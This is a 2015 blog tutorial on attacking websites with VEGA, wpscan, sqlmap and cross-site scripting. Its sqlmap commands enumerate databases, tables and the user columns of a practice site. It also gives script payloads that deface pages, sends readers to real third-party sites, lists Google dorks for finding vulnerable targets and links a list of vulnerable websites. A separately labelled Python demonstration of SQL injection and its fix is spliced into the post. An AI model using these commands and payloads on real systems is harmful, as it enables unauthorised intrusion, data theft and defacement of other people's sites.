Monday 30 March 2015


Exploiting Web Application using WPSCAN/SQLMAP/XSS/VEGA using Kali Linux

Post By - Tanmay | 3/30/2015 11:27:00 am


A post to make you alive again, with some cool steps you can use to take a website down.

Disclaimer : This post is for practice purposes only. Using these tricks without proper consent is illegal and it's your responsibility to obey all the laws. We are not responsible for any misuse or damage caused by this tutorial.

Practice Web Site : testphp.vulnweb.com/listproducts.php?cat=1

Starting with scanning for vulnerabilities - 

- Set up Kali Linux in a Partition or in Virtual Machine.
- Open up : Application > Kali Linux > Web Application > Web Vulnerability Scanner > VEGA

// I hope you didn't have any problem doing that.

- So, follow the steps below after opening the VEGA tool



After opening it - Go To Scan > Start New Scan


Enter the web address; you can explore the options further if you like, otherwise just click Finish.

Remember, you can search for vulnerabilities on any web page or site. Some sites also award you a bounty for finding bugs and reporting them to them ;)



The scan will run. You can see the site hierarchy in the Website View.


Now, BOOOOMMMM...

You've got  
XSS - 1
SQL - 1

Which we are going to use.



Information on WPSCAN : 

         __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_   \
           \  /\  /  | |     ____) | (__| (_| | | | |  |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

Used to scan WordPress-hosted websites. Can be used to enumerate users, databases or tables, for example :

 wpscan --url www.cheaphai.com --enumerate u  

 You can explore more by using --help with wpscan.rb


Using SQLMAP to exploit a SQL Injection Vulnerable website

Opening a vulnerable website



http://testphp.vulnweb.com/listproducts.php?cat=1

doesn't create much of a problem and looks like yellow gold, but who knows,
a " ' " can turn that gold into shit (both are yellow though).
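Why that single quote matters, as an added example that is not from the post: a constructed SQLite stand-in for a listproducts.php-style category lookup, with the string-concatenated query beside the parameterized fix. The table, rows and function names are made up for this illustration.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the shop database; schema and rows
    # are made up for this example, not the real acuart database.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        INSERT INTO products VALUES (1, 'Yellow hat', 1), (2, 'Blue hat', 2);
    """)
    return conn


def list_products_vulnerable(conn, cat):
    # The user-supplied ?cat= value is pasted straight into the SQL text,
    # so a quote in the parameter changes the statement itself.
    sql = "SELECT name FROM products WHERE cat = '" + cat + "'"
    return [row[0] for row in conn.execute(sql)]


def list_products_fixed(conn, cat):
    # Bound parameter: the driver sends the value separately from the
    # statement, so a quote can only ever be data, never SQL syntax.
    sql = "SELECT name FROM products WHERE cat = ?"
    return [row[0] for row in conn.execute(sql, (cat,))]


def probe(func, conn, cat):
    """Return ("ok", rows) or ("error", message).

    The database error leaking out of the vulnerable version is exactly the
    signal a scanner like VEGA or sqlmap looks for when it appends a quote.
    """
    try:
        return "ok", func(conn, cat)
    except sqlite3.Error as e:
        return "error", str(e)


if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'"]:
        print("vulnerable", repr(value), probe(list_products_vulnerable, db, value))
        print("fixed     ", repr(value), probe(list_products_fixed, db, value))
```

With `1` both versions return the same row; with `1'` the concatenated query fails with a syntax error while the parameterized one simply finds nothing.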



So, you've lamely identified that it is a vulnerable site. Enough talk till here. Now time for some action :

Paste this in the terminal

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs  

here "--dbs" will enumerate the list of databases.


Can you see the available databases in the last line :
[1] acuart
[2] information_schema

let's check the tables in 'acuart' -

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables  



Whoa!!

That was quick.

Now think, how can you enumerate PASSWORDS ;)

Time for XSS : Cross Site Scripting :

Cross Site Scripting is nothing but a vulnerability which can cause some serious problems for a website, like :  



So, that's an example.
If you know how to write JavaScript you can do anything with XSS.

Now, use Google Dorks by typing these in the search box :

inurl:item_id=
inurl:review.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:top10.php?cat=
inurl:aboutbook.php?id=


Literally, there are a lot of queries you can search for.

So, go to these pages

http://testphp.vulnweb.com/search.php
http://www.chauvetlighting.com/



Write one of the SCRIPTs below in their search boxes and see the magic
 
 <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1>Tutorial by - CS BEANS</h1></div>";</script>  
 <script>document.body.innerHTML="<style>body{ background-image:url('http://www.connectedrogers.ca/wp-content/uploads/2013/11/DespicableMe.jpg');}</style>";</script>  


For Bonus : 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns  

Open the Pastebin here to get a list of vulnerable websites : http://pastebin.com/xd9Vxyn9

Now go and create your own scripts and check them out.
